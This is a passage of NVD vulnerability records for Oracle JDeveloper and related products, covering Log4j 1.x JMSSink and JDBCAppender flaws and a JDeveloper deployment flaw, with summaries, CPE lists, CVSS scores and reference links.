Vulnerabilites related to oracle - jdeveloper
Vulnerability from fkie_nvd
Published
2022-01-18 16:15
Modified
2024-11-21 06:48
Severity ?
Summary
JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
References
Impacted products
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*", matchCriteriaId: "2A81678B-BD7A-42A5-84FF-DC2D3D650650", versionEndIncluding: "1.2.17", versionStartIncluding: "1.0.1", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:snapmanager:-:*:*:*:*:oracle:*:*", matchCriteriaId: "26A2B713-7D6D-420A-93A4-E0D983C983DF", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapmanager:-:*:*:*:*:sap:*:*", matchCriteriaId: "64DE38C8-94F1-4860-B045-F33928F676A8", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:broadcom:brocade_sannav:-:*:*:*:*:*:*:*", matchCriteriaId: "75B1EDA5-F189-440D-AD0E-C70DD2C0FEE5", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:qos:reload4j:*:*:*:*:*:*:*:*", matchCriteriaId: "EB681829-2B2A-4BDB-8DC5-B3C7D359F4C5", versionEndExcluding: "1.2.18.1", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:advanced_supply_chain_planning:12.1:*:*:*:*:*:*:*", matchCriteriaId: "A62E2A25-1AD7-4B4B-9D1B-F0DEA4550557", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:advanced_supply_chain_planning:12.2:*:*:*:*:*:*:*", matchCriteriaId: "0331158C-BBE0-42DB-8180-EB1FCD290567", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:5.9.0.0.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "B602F9E8-1580-436C-A26D-6E6F8121A583", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "77C3DD16-1D81-40E1-B312-50FBD275507C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:12.2.1.4.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "81DAC8C0-D342-44B5-9432-6B88D389584F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "DFEFE2C0-7B98-44F9-B3AD-D6EC607E90DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_eagle_ftp_table_base_retrieval:4.5:*:*:*:*:*:*:*", matchCriteriaId: "C68536CA-C7E2-4228-A6B8-F0DB6A9D29EC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.5.0:*:*:*:*:*:*:*", matchCriteriaId: "C4A94B36-479F-48F2-9B9E-ACEA2589EF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_messaging_server:8.1:*:*:*:*:*:*:*", matchCriteriaId: "E1214FDF-357A-4BB9-BADE-50FB2BD16D10", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", matchCriteriaId: "B21E6EEF-2AB7-4E96-B092-1F49D11B4175", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_offline_mediation_controller:*:*:*:*:*:*:*:*", matchCriteriaId: "61A2E42A-4EF2-437D-A0EC-4A6A4F1EBD11", versionEndExcluding: "12.0.0.4.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_offline_mediation_controller:12.0.0.5.0:*:*:*:*:*:*:*", matchCriteriaId: "5933FEA2-B79E-4EE7-B821-54D676B45734", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.1:*:*:*:*:*:*:*", matchCriteriaId: "A7637F8B-15F1-42E2-BE18-E1FF7C66587D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.2:*:*:*:*:*:*:*", matchCriteriaId: "E43D793A-7756-4D58-A8ED-72DC4EC9CEA7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:e-business_suite_cloud_manager_and_cloud_backup_module:*:*:*:*:*:*:*:*", matchCriteriaId: "86EF205C-9CB1-4772-94D1-0B744EF3342D", versionEndExcluding: "2.2.1.1.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:e-business_suite_cloud_manager_and_cloud_backup_module:2.2.1.1.1:*:*:*:*:*:*:*", matchCriteriaId: "6ED0EE39-C080-4E75-AE0F-3859B57EF851", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.5.0.0:*:*:*:*:*:*:*", matchCriteriaId: "6E8758C8-87D3-450A-878B-86CE8C9FC140", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7.0.0:*:*:*:*:*:*:*", matchCriteriaId: "054B56E0-F11B-4939-B7E1-E722C67A041A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7.0.1:*:*:*:*:*:*:*", matchCriteriaId: "250A493C-E052-4978-ABBE-786DC8038448", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.8.0.0:*:*:*:*:*:*:*", matchCriteriaId: "2E2B771B-230A-4811-94D7-065C2722E428", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "E67501BE-206A-49FD-8CBA-22935DF917F1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_data_relationship_management:*:*:*:*:*:*:*:*", matchCriteriaId: "E8E7FBA9-0FFF-4C86-B151-28C17A142E0B", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_infrastructure_technology:*:*:*:*:*:*:*:*", matchCriteriaId: "55BBCD48-BCC6-4E19-A4CE-970E524B9FF4", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1489DDA7-EDBE-404C-B48D-F0B52B741708", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "535BC19C-21A1-48E3-8CC0-B276BA5D494E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_manager_connector:11.1.1.5.0:*:*:*:*:*:*:*", matchCriteriaId: "9D7EA92D-9F26-4292-991A-891597337DFD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:middleware_common_libraries_and_tools:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "9AB179A8-DFB7-4DCF-8DE3-096F376989F1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", matchCriteriaId: "B0EBAC6D-D0CE-42A1-AEA0-2D50C8035747", versionEndIncluding: "8.0.29", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:tuxedo:12.2.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "EB7D0A30-3986-49AB-B7F3-DAE0024504BA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.", }, { lang: "es", value: "JMSSink en todas las versiones de Log4j 1.x, es vulnerable a una deserialización de datos no confiables cuando el atacante presenta acceso de escritura a la configuración de Log4j o si la configuración hace referencia a un servicio LDAP al que el atacante presenta acceso. El atacante puede proporcionar una configuración TopicConnectionFactoryBindingName causando que JMSSink lleve a cabo peticiones JNDI que resulten en la ejecución de código remota de forma similar a CVE-2021-4104. Tenga en cuenta que este problema sólo afecta a Log4j versiones 1.x cuando es configurado específicamente para usar JMSSink, que no es el predeterminado. Apache Log4j versión 1.2 llegó al final de su vida útil en agosto de 2015. Los usuarios deberían actualizar a Log4j 2 ya que aborda otros numerosos problemas de las versiones anteriores", }, ], id: "CVE-2022-23302", lastModified: "2024-11-21T06:48:21.983", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "SINGLE", availabilityImpact: "PARTIAL", baseScore: 6, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:M/Au:S/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 6.8, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 8.8, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 2.8, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2022-01-18T16:15:08.300", references: [ { source: "security@apache.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { source: "security@apache.org", tags: [ "Mailing List", "Mitigation", "Vendor Advisory", ], url: "https://lists.apache.org/thread/bsr3l5qz4g0myrjhy9h67bcxodpkwj4w", }, { source: "security@apache.org", tags: [ "Vendor Advisory", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20220217-0006/", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Mitigation", "Vendor Advisory", ], url: "https://lists.apache.org/thread/bsr3l5qz4g0myrjhy9h67bcxodpkwj4w", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Vendor Advisory", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20220217-0006/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], sourceIdentifier: "security@apache.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-502", }, ], source: "security@apache.org", type: "Secondary", }, { description: [ { lang: "en", value: "CWE-502", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2018-01-18 02:29
Modified
2024-11-21 03:05
Severity ?
Summary
Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Deployment). Supported versions that are affected are 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.2.0. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle JDeveloper executes to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data as well as unauthorized read access to a subset of Oracle JDeveloper accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle JDeveloper. CVSS 3.0 Base Score 4.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L).
References
| ▼ | URL | Tags | |
|---|---|---|---|
| secalert_us@oracle.com | http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html | Patch, Vendor Advisory | |
| secalert_us@oracle.com | http://www.securityfocus.com/bid/102569 | Third Party Advisory, VDB Entry | |
| secalert_us@oracle.com | http://www.securitytracker.com/id/1040207 | Third Party Advisory, VDB Entry | |
| secalert_us@oracle.com | https://www.exploit-db.com/exploits/43848/ | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html | Patch, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/102569 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securitytracker.com/id/1040207 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.exploit-db.com/exploits/43848/ | Third Party Advisory, VDB Entry |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| oracle | jdeveloper | 11.1.1.7.0 | |
| oracle | jdeveloper | 11.1.1.7.1 | |
| oracle | jdeveloper | 11.1.1.9.0 | |
| oracle | jdeveloper | 11.1.2.4.0 | |
| oracle | jdeveloper | 12.1.3.0.0 | |
| oracle | jdeveloper | 12.2.1.2.0 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.0:*:*:*:*:*:*:*", matchCriteriaId: "07EF593B-376C-4367-B9FB-1F429062576C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.1:*:*:*:*:*:*:*", matchCriteriaId: "9E9124B7-0F2C-4018-B5B5-5BA659333933", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.2.4.0:*:*:*:*:*:*:*", matchCriteriaId: "2B70A973-A5C5-4E51-B93C-C22888E24FF1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.2.0:*:*:*:*:*:*:*", matchCriteriaId: "739DC3EA-E25A-449B-8468-9A65AECC47C4", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Deployment). Supported versions that are affected are 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.2.0. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle JDeveloper executes to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data as well as unauthorized read access to a subset of Oracle JDeveloper accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle JDeveloper. CVSS 3.0 Base Score 4.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L).", }, { lang: "es", value: "Vulnerabilidad en el componente Oracle JDeveloper de Oracle Fusion Middleware (subcomponente: Deployment). Las versiones soportadas que se han visto afectadas son la 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 y la 12.2.1.2.0 Una vulnerabilidad difícilmente explotable permite que un atacante con un alto nivel de privilegios y con permisos de inicio de sesión en la infraestructura en la que se ejecuta Oracle JDeveloper comprometa la seguridad de Oracle JDeveloper. Para que los ataques tengan éxito, se necesita la participación de otra persona diferente del atacante y, aunque la vulnerabilidad está presente en Oracle JDeveloper, los ataques podrían afectar seriamente a productos adicionales. Los ataques exitosos a esta vulnerabilidad pueden resultar en el acceso no autorizado de actualización, inserción o supresión de algunos de los datos accesibles de Oracle JDeveloper, así como el acceso de lectura sin autorización a un subconjunto de datos accesibles de Oracle JDeveloper. Además, esto podría dar lugar a que el atacante consiga provocar una denegación de servicio parcial (DoS parcial) de Oracle JDeveloper. CVSS 3.0 Base Score 4.7 (impactos en la confidencialidad, integridad y disponibilidad). Vector CVSS: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L).", }, ], id: "CVE-2017-10273", lastModified: "2024-11-21T03:05:48.103", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "LOW", cvssData: { accessComplexity: "HIGH", accessVector: "LOCAL", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 3.7, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:L/AC:H/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 1.9, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: true, }, ], cvssMetricV30: [ { cvssData: { attackComplexity: "HIGH", attackVector: "LOCAL", availabilityImpact: "LOW", baseScore: 4.7, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "HIGH", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L", version: "3.0", }, exploitabilityScore: 0.6, impactScore: 3.7, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2018-01-18T02:29:16.130", references: [ { source: "secalert_us@oracle.com", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { source: "secalert_us@oracle.com", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/102569", }, { source: "secalert_us@oracle.com", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securitytracker.com/id/1040207", }, { source: "secalert_us@oracle.com", tags: [ "Third Party Advisory", "VDB Entry", ], url: "https://www.exploit-db.com/exploits/43848/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/102569", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securitytracker.com/id/1040207", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "https://www.exploit-db.com/exploits/43848/", }, ], sourceIdentifier: "secalert_us@oracle.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-22", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2022-01-18 16:15
Modified
2024-11-21 06:48
Severity ?
Summary
By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
References
Impacted products
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*", matchCriteriaId: "0C02831A-AD76-43D3-BEB1-DA94FA70A25E", versionEndIncluding: "1.2.17", versionStartIncluding: "1.2", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:snapmanager:-:*:*:*:*:oracle:*:*", matchCriteriaId: "26A2B713-7D6D-420A-93A4-E0D983C983DF", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapmanager:-:*:*:*:*:sap:*:*", matchCriteriaId: "64DE38C8-94F1-4860-B045-F33928F676A8", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:broadcom:brocade_sannav:-:*:*:*:*:*:*:*", matchCriteriaId: "75B1EDA5-F189-440D-AD0E-C70DD2C0FEE5", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:qos:reload4j:*:*:*:*:*:*:*:*", matchCriteriaId: "FDAF3CC9-3827-4634-85B6-DA94368067EB", versionEndExcluding: "1.2.18.2", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:advanced_supply_chain_planning:12.1:*:*:*:*:*:*:*", matchCriteriaId: "A62E2A25-1AD7-4B4B-9D1B-F0DEA4550557", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:advanced_supply_chain_planning:12.2:*:*:*:*:*:*:*", matchCriteriaId: "0331158C-BBE0-42DB-8180-EB1FCD290567", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:5.9.0.0.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "B602F9E8-1580-436C-A26D-6E6F8121A583", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "77C3DD16-1D81-40E1-B312-50FBD275507C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:12.2.1.4.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "81DAC8C0-D342-44B5-9432-6B88D389584F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "DFEFE2C0-7B98-44F9-B3AD-D6EC607E90DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_eagle_ftp_table_base_retrieval:4.5:*:*:*:*:*:*:*", matchCriteriaId: "C68536CA-C7E2-4228-A6B8-F0DB6A9D29EC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.5.0:*:*:*:*:*:*:*", matchCriteriaId: "C4A94B36-479F-48F2-9B9E-ACEA2589EF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_messaging_server:8.1:*:*:*:*:*:*:*", matchCriteriaId: "E1214FDF-357A-4BB9-BADE-50FB2BD16D10", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", matchCriteriaId: "B21E6EEF-2AB7-4E96-B092-1F49D11B4175", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_offline_mediation_controller:*:*:*:*:*:*:*:*", matchCriteriaId: "61A2E42A-4EF2-437D-A0EC-4A6A4F1EBD11", versionEndExcluding: "12.0.0.4.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_offline_mediation_controller:12.0.0.5.0:*:*:*:*:*:*:*", matchCriteriaId: "5933FEA2-B79E-4EE7-B821-54D676B45734", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.1:*:*:*:*:*:*:*", matchCriteriaId: "A7637F8B-15F1-42E2-BE18-E1FF7C66587D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.2:*:*:*:*:*:*:*", matchCriteriaId: "E43D793A-7756-4D58-A8ED-72DC4EC9CEA7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:e-business_suite_cloud_manager_and_cloud_backup_module:*:*:*:*:*:*:*:*", matchCriteriaId: "86EF205C-9CB1-4772-94D1-0B744EF3342D", versionEndExcluding: "2.2.1.1.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:e-business_suite_cloud_manager_and_cloud_backup_module:2.2.1.1.1:*:*:*:*:*:*:*", matchCriteriaId: "6ED0EE39-C080-4E75-AE0F-3859B57EF851", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:e-business_suite_information_discovery:*:*:*:*:*:*:*:*", matchCriteriaId: "4D63C2CE-622B-48A8-BD74-09A9B05EDE7C", versionEndIncluding: "12.2.11", versionStartIncluding: "12.2.3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.5.0.0:*:*:*:*:*:*:*", matchCriteriaId: "6E8758C8-87D3-450A-878B-86CE8C9FC140", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7.0.0:*:*:*:*:*:*:*", matchCriteriaId: "054B56E0-F11B-4939-B7E1-E722C67A041A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7.0.1:*:*:*:*:*:*:*", matchCriteriaId: "250A493C-E052-4978-ABBE-786DC8038448", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.8.0.0:*:*:*:*:*:*:*", matchCriteriaId: "2E2B771B-230A-4811-94D7-065C2722E428", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "E67501BE-206A-49FD-8CBA-22935DF917F1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_data_relationship_management:*:*:*:*:*:*:*:*", matchCriteriaId: "E8E7FBA9-0FFF-4C86-B151-28C17A142E0B", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_infrastructure_technology:*:*:*:*:*:*:*:*", matchCriteriaId: "55BBCD48-BCC6-4E19-A4CE-970E524B9FF4", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1489DDA7-EDBE-404C-B48D-F0B52B741708", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "535BC19C-21A1-48E3-8CC0-B276BA5D494E", 